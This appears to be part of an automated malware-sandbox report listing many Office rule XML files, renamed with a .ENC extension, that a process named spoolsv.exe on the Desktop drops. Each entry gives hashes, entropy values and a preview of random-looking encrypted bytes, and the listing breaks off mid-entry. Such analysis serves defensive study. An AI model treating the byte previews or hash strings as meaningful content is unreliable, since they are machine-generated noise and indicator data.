                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.531331852871462
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s28+e/uA1gVVqXqMh6T0KLPcX68QJ0Czm:/oy2gUqMhm0KLktQHm
                                                                                                                                                                                                                                                      MD5:E6AFB8A0003EE2963E3EAE2436BA1762
                                                                                                                                                                                                                                                      SHA1:428C280A3AF80C09DA52135749856B96C9C61E37
                                                                                                                                                                                                                                                      SHA-256:2B5A56A6BBCC1AE60C62AD38BE0C0587C29A1539488CB95EECF46936FF0973AA
                                                                                                                                                                                                                                                      SHA-512:DB89540D4B91CC67E07D60B53A9723560726F94A68A373B90617D261F889E732ECE9A6569045356E180F799E3D15AEE743EFDEB037B7455E48FF7CB6DA2C5690
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.;...%..f.....>Ri..H.....RC.\...p.."L..k~6.}@.K.o...W.gf.i\...B..*U$..$..H5K.qx..,.Myb...T....o.C.g...i...l.H......m....|b.\U.,hp....R;.......1....2......-/.-u..1...[..'.......q._...;<.B.12WJ..z.."X."..p.n.&.h......|.:T.Q...dk....!......ms.Mv. ..mc=.&...D.h;..d2..W..1.S.O.e.....UK...l.+..'..?..`+.Wy. .w..^..d}/]k.. ..`f.....f...0...;{..t....a....i...Y.ah.s.....N.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120654v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.539607114474425
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2HmN0oJbwsOByT3rElPpGJIzLgXc957mOcXVaZIub9JulBNeivx:/CNwryEBpGJcOc957mladwLeC
                                                                                                                                                                                                                                                      MD5:B3A14514E869457B56A631150CDC5925
                                                                                                                                                                                                                                                      SHA1:ADF7B1A69B0C2A22843F3DAB5B9681EB0FB49C90
                                                                                                                                                                                                                                                      SHA-256:DA74CDE461DD1B652C716A073855483EA48279C8E715AC733B90676EFC6448EF
                                                                                                                                                                                                                                                      SHA-512:FB6E6722FFAF874ADE5F5988F4F78A21E282A2FDEEF1BB759BE0C4D7EFFB8A73B84B625FE0CFDE37C18D248AC1A7F5B2488BA0BD185C83D517C59820796C5E2D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..}.....@...{...G.Y..2...8.y...:..6@..^.#.=....g.s1..M...pI....d.b........Pl.d.F.AS......u..qR.A.;kl.9.J.k>mS...f.RG.}......_j..t.......R..?#.V.A.n.Yu.3.Z...>:J5..s1E.f....D.".f+&.}..el.P.w.s...Qm..........=./tM3.9.:7j7]..|...........y%.z.Q.g..7G.yx.........[u...A5... .j.nG...eV.6...kb......]..$..:K..~.|B.b....kW..l#.\Nj*=.!......./%..4Ra.U.A. "'asOx..%...... c-..Y}...v.'<.....w.Ih.F...;...n2.....FL1..+2.z.Q...0.-.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120655v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.509033871249378
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s22wX6CYK1hweU2SCJIaDmS4kKZvKUohXKOxv5J:/KwX6CYAhweDtGS4kKZvKThXKwH
                                                                                                                                                                                                                                                      MD5:E218A49C8225F91C192275B7C09AE71B
                                                                                                                                                                                                                                                      SHA1:9F02D54FC65C804A8AAEDE59C135EB82CA06853D
                                                                                                                                                                                                                                                      SHA-256:32A9D5C9EE268DE38D3A6E13F60A5B34737938D194F3506BE754D5DA2993EA16
                                                                                                                                                                                                                                                      SHA-512:A9BA60BB6CE2571A497C6D6B1859A553509EB79B9DA4C02CCCB7F926C0E6E72A219A11E099C70F2F17553FD39786D22FAF732F2B7E2D37051E5F565D5E79BF78
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.R..5...&.C...fHM.B...u.S\.3.....'.....).Il..:..y.'|._..&L/s.#.7...x..R./...N.i.P......0eU..%d.D..^.%..m.W..A..z,..I....@w%.x._...X..G.....R.b.o.....q.3.S..!.G.`w...'....k.0").Q..S.LT+.).%......xd..]5...N|....^...a..Xa$M. ..1.Z..pL...N.....!....P...._........e...8......X.....%....1..`.w...]7S..............-.j?...d...q.....TyO...k\.mNZ.j.;.Xo..D.P%.|......S1.5.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120656v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.549615044969071
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2CLXWR23wKP0T6KJ9yEJhHpTIASC4nYV2Dycd:/SWBU0h9hvJTIASC/V2r
                                                                                                                                                                                                                                                      MD5:DA2F30D3FB8EB0836C0690EBD07408CF
                                                                                                                                                                                                                                                      SHA1:3B15D9FBB17B687C3759CEC34680649127A0768B
                                                                                                                                                                                                                                                      SHA-256:D4EAB17B62DB0EC171E9955033A40F0224F317EA94046D3158CAC4E858B7C437
                                                                                                                                                                                                                                                      SHA-512:B39D45D3CB1A257404420BA49DA830A1EA5EFFBAB85C32E9D16D7850FB6D398ACC11E726E274DE6BCC60B5FD0778D175E33A08120DA4F27A90BF72F7C497A725
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..t<...)Al.I...../P.}.3i.{..=....E9u...]..<w}+.|/.V...^....i..GG..tS..3..4...]p.8..B.......M.'.`...ag........,..$l|g...}.P.\".a..V..^...?5]Y..e.........:A67....l.nV.'G...4....![...q`+.5;X^<....t......E.!.,.V.G...D.` ...k9fG..0.. K.<.S.T..2..4.....j.......'..i.#..^$.............T..".~..K.Z.F.%..'.1......B..?.o..\...y.o.B..g..........^s.H2.%.?Y.RY..@7..G-.&......h..:vH^a..}.b.t.....r&$..4..2.P..U%.RI<YE.`...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120657v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.536058343565824
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2jeZzv0kP8AOQRYM6ULQPW9tktHN7yWd:/GMq8AOyRm+9tktZd
                                                                                                                                                                                                                                                      MD5:06BD82C511498CC6AF10C4FD2541292B
                                                                                                                                                                                                                                                      SHA1:A699948B8FD0DE8EFACD079D04BF982678AD4AB5
                                                                                                                                                                                                                                                      SHA-256:1B7077C00478177D1B30097444D38A12B121FC7EEB363528CD0272472B269CCB
                                                                                                                                                                                                                                                      SHA-512:DC0AE4B7F563B9D0F912D3971570D74239051C5E52542D278A860EF88116B7DBF30D82C8874C57388C560B2184C7F2F66E9D982A9375550E3A4A0FF7B48FCF94
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..$>.(.t.......J}.E.7D....Z....$..7.k.....'..L(2.....s.U.l@.!Kf.LzY.....g.d.8...X..m'.....3....nr.!B 7.).....)...........k.x.._"Y..2.....j..C?..&....VM\..9.D...rN..}.H.4.h.$m1m...22......%~..T.4.B....p.0..q.eO.R..$?..5.,":.SV.xH...^b#..5.sR.v.X.a.|&.2..V{..@rT.N...?.....4..Y.3..WJ..CQ.K7^.,..u....=r.qT..u.hW.d..n._.6..O..Ff.J.g 1e.e..^~Z.E.}%........s..r0..o....?.j.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120658v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.604379697739307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2BldPqjGrJ7oLCEk5t0tBXbUVQ5hlIqJhiO3q89EmUY:/lldPOuWLxwt4BrQQ5syZv
                                                                                                                                                                                                                                                      MD5:DA6714DF9B43E68719F9FD569EDDC7E0
                                                                                                                                                                                                                                                      SHA1:D2E79AE099B1A72904CBFF9809D830BAD9BC0C03
                                                                                                                                                                                                                                                      SHA-256:7AB108C7DA10977C45B63CF36E0E971ABECD4F3EDC7E7C56907BB9C4E5E333F2
                                                                                                                                                                                                                                                      SHA-512:E8BEB1B7A9AC446D9C85B1B165D597E59EABAC9906FEFE69B447DD0F7F71610830EB31825A012277ABE652B3E1C5EC48857284F3E7615B008FABCA57547D9615
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..3..:..o..\.X......K.n........."..'.-c....kt>......$|@..... *..~.|.Z.....\W....z..dE..!D.Z..9m"...v....2.n.M..O.....@..K.=.~L..;.....=..#..[....q..|...ZC-~-(....D{..Od...HL*....SV...S...c.GU.._.~F.....`*.L..Ij.;I3..;r=.V.3....B....i...yt.."..A.......H.Dt..fT..0T...Mg.......]8..5..|.%...+..".......M..f..wV..........J.Wn.W..`..!.$..l.(..v...^.?...w%F....T.Q..s..#I........I.3[7..f...M..B"\...%....h7.gH."

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120659v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.549474054283805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2I/YMMd6Opa2qWntvcoRpNsYrY1u8Z6osavtvyR5Xj1:/GYMYpa2qWnLRpNs0Y5yfXj1
                                                                                                                                                                                                                                                      MD5:F9E647F87A2688F6ADDBF8F08F94038E
                                                                                                                                                                                                                                                      SHA1:3BC510199C8430A46CD565453B016C42BE5CABB6
                                                                                                                                                                                                                                                      SHA-256:CC54AF39787A1E90F2235C77CA870956DF9EF83D45CDB08A1154C15E906E681A
                                                                                                                                                                                                                                                      SHA-512:67C0B3A9CA4582A24FEB888FDDE2849F709D2455B28C85801E94574D1492F12E2F36F44F021C3F679814BB012BB7D860BED0CA61ED62CFCB4913DF4F4D521F1A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...../.>=..Wj.VG7.[...A..6...:N#.%s...U)...-.0..o.J]...`...?.....-.?..u..n.=. *..3......9..]..*.....L.A..&...H&.oy....8ka..9pm.]/.r.,.fQ....V...a...yH)..kP#.d.s.U.D}.H.j.6..`.5{..d.Q!.`9._....0~3J.x.k...E."q.5..9.....yLq{.._0.7.....lz....K...U....ae.W....x....?.[+.D..r.=... ..a}.&9s.M....>...fDb.....L0=._......H.c....m.........../.O.J.....\ .*gE...>%s..*.{.3...y....Y..y.#...W..F..C>.).- ....S.XL.....F..'......?.%.J..!

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120660v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.601663722185796
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s247v2W2IFqh9wOAPXSwZETUDw6cQiBQbUtWRpWvtON:/sCW2FhSOsEToI6UtUWUN
                                                                                                                                                                                                                                                      MD5:D867444B2B8436E027F3F195079E1863
                                                                                                                                                                                                                                                      SHA1:BB9C9CE76715448B26C2FD829C665B0BC5D26221
                                                                                                                                                                                                                                                      SHA-256:91534FBFCF3257FAB16604D5B9A478F2AF87F272F606B7D3B1F33E370B602C10
                                                                                                                                                                                                                                                      SHA-512:1B0A0F19CCD17622B093CCF8719D0A84DF091A50831C87B6CABBCD1CE2FF4B2BAD9B1B860DC633BE44B1CE2C302B8BD5AFC50EBDC159E59C2846EEF63A9E262A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.g.>.c..........$c=..d.i.b^.W... 8...]I3i.yQ{j.j..br..A.....n_......2.C...E.<.....0.i.w..0._.rM.k.....}.8..t..$).......K;:'-b.<J...z.e.L.}...a.'....$K.;.9X.>...,.g..Q.+E1O..55.C...R.H..)9.t5...X....ld...a......FD.....C..6sk\.).._..&........8....P.9 ........._..B>.....*E.u.U...y...$...N2c..!.P4-...-..}v[..........^.d^..z..^@~.A.....U..y.%/tHt.=M.@O.xk...\@.r..d.@.!.fa.Xipj!g..w2.^T......N.Y-...{>..j.......2..E..K...f"..{.5

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120661v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.434314487599177
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s24zSU3tEXm8LkxL/kWlyLW+ISRdIhDvUd0x://XlLkqWly5dIhLQk
                                                                                                                                                                                                                                                      MD5:131E33EF9B7EAB2E230DEAE7A3D476CC
                                                                                                                                                                                                                                                      SHA1:5B6BBAE6549AB1BCE5889FDE0C5D984826FE18CA
                                                                                                                                                                                                                                                      SHA-256:28A4A81FCA82FF5B6CD7C6BFA6694A57B5D510270CE6D6FAB73A9F599D89B050
                                                                                                                                                                                                                                                      SHA-512:896B9F47C6DA6A487859DC6835987889F99A36B2E6423FB9B2F699E0562BC1F7813CBE3E4662C4E25E2E5D91737C7096AFDCA62DF21901ABDACD367A6DDA8EE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.-5.H.|........ww..D...Q.G..~./.?.3...kt.w|..U..i.tr.T..S..C...r<p..U.7:...!....{....2..R|!..E..n.\.J^|.....O.z..........9..I....(:.........wn...{.*.$fK.....T..OVa<.....PI.....BJqOV....}.f.9i..j.d(...8!.{.i........-......\.M|..!.%I..Z.,I..64...*......:....(9A..}w-.e.]^.=V.<.v:.8>@]...Q].......j..2....{....X..r...x<&...a.3.?Vw..I8`...kG..^.:.dQx..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120662v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.54260692113411
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2mlDTIGn+hLU8P+K3OiCunl8LwIgaHBpzD/nkLtcbI+:/aCw+hLzP+K338Lwv6/zDnkLqp
                                                                                                                                                                                                                                                      MD5:AE4E5250EDD0011700E7598EAC94C925
                                                                                                                                                                                                                                                      SHA1:B816682ACADA67918151688E5642B45A4D91B912
                                                                                                                                                                                                                                                      SHA-256:C6E2EAE599F0A3407C509295B99E9DEBE911CDFBC2F54D028E80E199EC752D5B
                                                                                                                                                                                                                                                      SHA-512:0EA41CA555E592609106463A9998142919E5F960333447E2053AF52A21089E9EF58F63DE5D32C34A2E767C97078031FB496DE7CE94C136B2323CBD7476DC489E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..<*Bj`4~/.p..F(.[".&....2.3...i.sQ......<...$.).a...Je.W;.#L.l...:l..`...".....dY...=.....;".]A.O..Pu4e....?.D..H.B.N..\y6|(...&&..}...2[..1.V..CnD..e.6Eef..... .s.../..Y .$'...5..pp.s...5.ubH5.I%;.}.?-.FFu..".HGw.<.e.......[T..$.}(.....a]71.Yn...*8..\{.X|/.y.B.v....F...l.<....![..SGK...O.S....As(...q.&....'..,.2..Y..$..4....B.=J.L..>......^.6.f...i}?........x.d..j....p}.F.4K.,.AH.l-._..qo."....#.~....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120663v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.545377398077312
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s27nm6w2COkp8mXduJ7DYmzyKJMPuJQ/r6Oc1Rqq:/V8FUommKMWJQ+Oaj
                                                                                                                                                                                                                                                      MD5:FC2C2C5F3D32952292FAF4A044C361A6
                                                                                                                                                                                                                                                      SHA1:185FD5DF4455E94354F602AF17457B155F918839
                                                                                                                                                                                                                                                      SHA-256:791393385134E00619AC79FAB3C73BA305BDB31D2EE4A06C66F6E5AB4EC541AF
                                                                                                                                                                                                                                                      SHA-512:CBBEC77B4D8579709DEEB57C6E24C8E233DB87BF09AF6CE210F96152C16C8C5CF7C9D42EA89A5D96B4C38194A57ABC0B084E9721C9276EE32A4BF2DB39ECFF69
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..d..%.c......`.6..QL./.O...qsR..OM..zo.;..h$..(..Rc..S..(.OY].Y.../f....5.j]...C....d..........0..?.H....R@*.e.ZL...Pjv...H...=..<T.p.....F.)l....h.e.h._..6.Q%.l.^S..M.L]...7.^..P..XA....._.}....r...ew.B...IM.7....C$.DY....<Q'w.m~..z..N.@.........0........$........g...v...Gi..........?..P.P+G....f,%\.0z...W1....enAT.7.7.M.ML...M..0.l.t..p.e..d......l.bh&.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120664v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                                                                                      Entropy (8bit):7.643241017732472
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2KY8VGbPe6/2yBYxHpi7XQTyuZrzMmb:/2kPiiA1lomb
                                                                                                                                                                                                                                                      MD5:0A38BE69AAFC8C85ADE6186E5BCBA001
                                                                                                                                                                                                                                                      SHA1:EC96C9AD35E933E6B4D3294D1746FC8471DF7622
                                                                                                                                                                                                                                                      SHA-256:5D37751D749783D1E72305B470F08430FB78620F26792229AF884E3C4E9492E8
                                                                                                                                                                                                                                                      SHA-512:8368AA2B5EF758F9B9265B368FEEB91E15E1F58A3E48078A64B8C4ADCB514EF583C767B505F46417D377EDF9329ABF68F7C3215B4DCB8E88FC8E70569ABFCB9D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t."..Z......H..$5.....4...:.S..oh...^.F p"{...s.v.9..e$.M.Sp2..0.m.n...x..h.....$..V*.zU..+....u........q$b..O...'..^.I.........P..R1.LG.S.]'.Yt...k.{f...k5.Mc......9.F../}...@.L...f..^.5..M.r.M..c...x."F...3......>&..O.f<3...{.../+....#..Z...s.-..Y.D....W.(....@....quc.k.H....f[...D.....Lb..!%.4.=n..\f.D.V..F....z_.E.?.2r.....VR5S.F3.[].:.yD$.l^w.o....|1'.....r..m.....}a..l8...D....k..v...=..>..v.>Wf{.S..~1....N.J.....D>;.i.X.....G..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120665v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.474350598253156
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2f5twhrNikRYp7tWguY29da4sn+R/o97zWuDEdsVdpwvmMHvUSZXjmiBFe:/7s2M/i6StWguBZ0EoZzWuDEu6THvzT4
                                                                                                                                                                                                                                                      MD5:2B0E5CDD036C36381263CDFADB8A9642
                                                                                                                                                                                                                                                      SHA1:55814BD88416F8BF800363D1D0EFC7E2CA768B37
                                                                                                                                                                                                                                                      SHA-256:3C94773D94C954FF1DE3460D7E343577C711CA65A72F3075D6FA1CB65BBE5B10
                                                                                                                                                                                                                                                      SHA-512:6C3A6303BFE90D62E5994041A97F6B40F1FCD20B6F095EE5CFA27BF1F99815C5FEE3550644E9DFC3A64200FD278D5EB044FC8B881B06F808DC9E1D98711947F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.@}%".Y.D..C;.../^..Sw.|viH.4'..o..x..c..%.....E...".H..|x."~p...x.C...j.......P.....:}....Xg*....E.85..%_5H.N.Yo-(.E.f.C..+Y......\.7...EDX...."a..E"...:!.H....a.*...0 ../I.c..i..........D..J.%M....l.P...yD-~....9y..7..S...uC......]...P....VfWc.......yu..r.0.\X...<.^.........aF.}.!....`p...^L|.._.J...-.t+c..r...S...jB.N..U.G%...I=.i....(w_.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120666v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.480568163583514
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2rCw4WuIZZDtQeYnMD4n95PSFmu11/gt6vccOYGm7FexgrknUNw28SeDaG2:/7s275uQtQe2na3yujOxm7FcskUNd8xU
                                                                                                                                                                                                                                                      MD5:F6DB63617DDB291A36F3760F661F4D91
                                                                                                                                                                                                                                                      SHA1:D94EED758058275EBE306052F2F3D22CC630C712
                                                                                                                                                                                                                                                      SHA-256:C85F741A53AA4C4768F3830C6B32D2632A30933379F08AEFC6ADD4E845213121
                                                                                                                                                                                                                                                      SHA-512:54BC80BAA1ABFA7F8AD9B0F50BEB46EAA669019B115C5E31E8C9E5E2F54525E83FF3F89F735F88611758FB84821EBA7601FD3E8570AE3E75E29A3FE83D4068BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....s...X2Y..Vd.~";........?z....h$..m.<.5.3.........iukm.'..=....v..I..|...#`.....^i.:Z&fW.w./..4........W0........2b....6....J../6.U.P..W.......C ....}..tr..dxN.-?..=...O...W\.(.d.....|nB.S...^-r..O..L1b..|".o....#..z.B7..P...m.....u.}s|n..0.&M.....7.~...S|.7..!6".a.A$.]....B.......#..!g?....h....m.%..."'?.. ;.-X...VN.....X.n8...........'+`.qb..4......2..Ah?....&....2....../.....@Q.;....2....p.mm;.wM_.\.., .

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120667v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.486959041757568
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s225D0o7tyOw7ARNku507JGjhRruvJSeDyktyvyBrDBIujriJr:/7s2G0o7ty+50w7SJSwyktyKlDiCrqr
                                                                                                                                                                                                                                                      MD5:295B801576FE4960F7D9F292DD4AEA79
                                                                                                                                                                                                                                                      SHA1:FE661CBA2F7D338B0993824F06FAA4F1F5CE7CF3
                                                                                                                                                                                                                                                      SHA-256:5A531D9E652D71895D0DBDD69182FE73326787357CF64246A149BE0BF4D25085
                                                                                                                                                                                                                                                      SHA-512:02175B3C39EBBA3DFB3372322F3BA780B74B3E50743994ADF3DDB5C3FF4D1C193738FA613AAC0591BAE7633E7F1D306D82623C5A46992F7230C9BFFABA4D180C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..q....t\.....*..&..DT.u.....D...n>..^.s...BE.b.q5..C..V.A2...e.J.j.J.v......./9.WN.-.p.:.nSl+.u..u..".l.....cj..k...z....J^............ FlD...A...8..y..`.a......../..G!5.9.4.'2..+$5.6.m..(.....%.h...4+..Uq<.W......K.4...sA....`..."KX&i.s|4Qv....K...|;W.[j?.f.X...4.2.|...J.Qp.3.....x....e..H^......md2......hl......f..r....j...S.o.....P...R.xU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120668v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.6104885469458905
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2dgRUZzODkpr4np/Dkx08DEU3T5LbXou3:/hg6ZzYntdDU3T5L7om
                                                                                                                                                                                                                                                      MD5:C35736764EF2EF73938FEA96C10BD467
                                                                                                                                                                                                                                                      SHA1:820812D257E4AA908188FDDEE75C3D06176FAACA
                                                                                                                                                                                                                                                      SHA-256:0C8F2B470B0E6F110B944B09F64B14516F0AFE8BA92162FDF50F8D8D16B3EFB8
                                                                                                                                                                                                                                                      SHA-512:B833425AEE6AD94D77F641AF8F5C7FCC667F43A690690EDAAD0CBA95152212D489B5B5EC5016C773F269C1E651BC794C937776BFD9E342757B9BCBCBB6ED1C59
                                                                                                                                                                                                                                                      Malicious:false
